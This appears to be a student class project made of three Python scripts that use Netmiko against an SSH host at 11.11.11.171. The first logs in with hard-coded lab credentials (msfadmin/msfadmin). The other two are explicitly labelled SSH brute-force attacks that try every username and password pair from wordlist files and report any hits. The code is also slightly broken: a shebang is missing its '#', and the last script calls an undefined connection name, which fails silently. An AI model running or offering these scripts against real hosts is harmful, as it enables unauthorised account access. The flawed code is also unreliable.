# Project_One_Class_Python
Project_One_Class_Python
#!/usr/bin/python

from netmiko import Netmiko

sshconn = Netmiko("11.11.11.171", username="msfadmin", password="msfadmin", device_type="linux")

print(sshconn.find_prompt())

sshconn.disconnect()
!/usr/bin/python

from netmiko import Netmiko

wordlist = 'word.txt'
user = 'msfadmin'
ip = "11.11.11.171"

print("[*] - SSH Brute Force Attack")
print("[*] - Target:", ip)

with open(wordlist, 'r') as _wordlist:
    for _line in _wordlist:
        _pass = _line.strip("\n")

        try:
            sshconn = Netmiko(ip, username=str(user), password=str(_pass), device_type="linux")
            print('[+] BINGO - Username:', user, 'Password:', _pass)
            sshconn.disconnect()
        
        except:
            
            print('[-] FAIL - Username:', user, 'Password:', _pass)
            #!/usr/bin/python
from netmiko import Netmiko

wordlist = 'word.txt'
userlist = 'user.txt'
ip = "11.11.11.171"
verbose = 'no'

print("[*] - SSH Brute Force Attack")
print("[*] - Target:", ip)

def func_sshbrute(_user, _pass):
    try:
        sshconn = Netmiko(ip, username=str(_user), password=str(_pass), device_type="linux")
        print('[+] BINGO - Username:', _user, 'Password:', _pass)
        sshcon.disconnect()
        
    except:
        if verbose == 'yes':
            print('[-] FAIL - Username:', _user, 'Password:', _pass)


with open(userlist, 'r') as _userlist:
    for _line in _userlist:
        _user = _line.strip("\n")

        with open(wordlist, 'r') as _wordlist:
            for _line in _wordlist:
                _word = _line.strip("\n")

                func_sshbrute(_user, _word)
